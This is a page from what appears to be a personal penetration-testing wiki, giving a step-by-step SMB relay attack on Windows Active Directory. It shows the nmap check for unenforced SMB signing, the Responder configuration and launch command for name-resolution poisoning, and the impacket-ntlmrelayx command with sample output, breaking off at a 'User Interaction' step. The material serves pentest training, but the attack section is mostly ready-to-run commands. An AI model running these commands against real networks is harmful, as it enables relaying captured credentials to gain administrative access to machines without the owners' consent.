❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • Microsoft Azure
  • REST API - Bypasses and Privilege Escalations
  • Web Pentesting
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Token
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Prerequisites
  • SMB Signing
  • Nmap - SMB Security Mode Discovery
  • Admin Account
  • Responder
  • Modify Responder.conf
  • Start Responder
  • NTLMN RelayX
  • User Interaction

Was this helpful?

  1. Infrastructure Pentesting
  2. Active Directory (AD)

SMB Relay

SMB Relay through Impacket Responder and NTLMNrelayx

PreviousSMB & RPC EnumerationNextImpacket

Last updated 4 years ago

Was this helpful?

Prerequisites

SMB Signing

SMB Signing is enabled but not required (disabled) on Windows workstations and enabled and required on Windows Servers by default.

Nmap - SMB Security Mode Discovery

There are two nmap scripts for SMB message signing mode detection, one for SMBv1 and for SMBv2 we are going to use.

nmap --script smb2-security-mode.nse -p 445 127.0.0.1

...
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 12:34:56:78:9A:BC (Unknown)

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required

Copy all targets (IPs/hostnames) into targets.txt.

Admin Account

A user has to be admin on the relayed machine (You can't do SMB relay without an admin account).

Responder

Modify Responder.conf

# locate Responder.conf
/usr/share/responder/Responder.conf

Disable these options

  • SMB = Off

  • HTTP = Off

Start Responder

responder -I eth0 -rdw -v

NTLMN RelayX

The Relay server starts SMB and HTTP server (that's why they are disabled in the responder).

#locate ntlmrelayx
impacket-ntlmrelayx -tf ./targets.txt -smb2support

..
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation

[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to hosts in targetfile
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections

User Interaction

Now a user needs to address SMB folder

nmap --script smb2-security-mode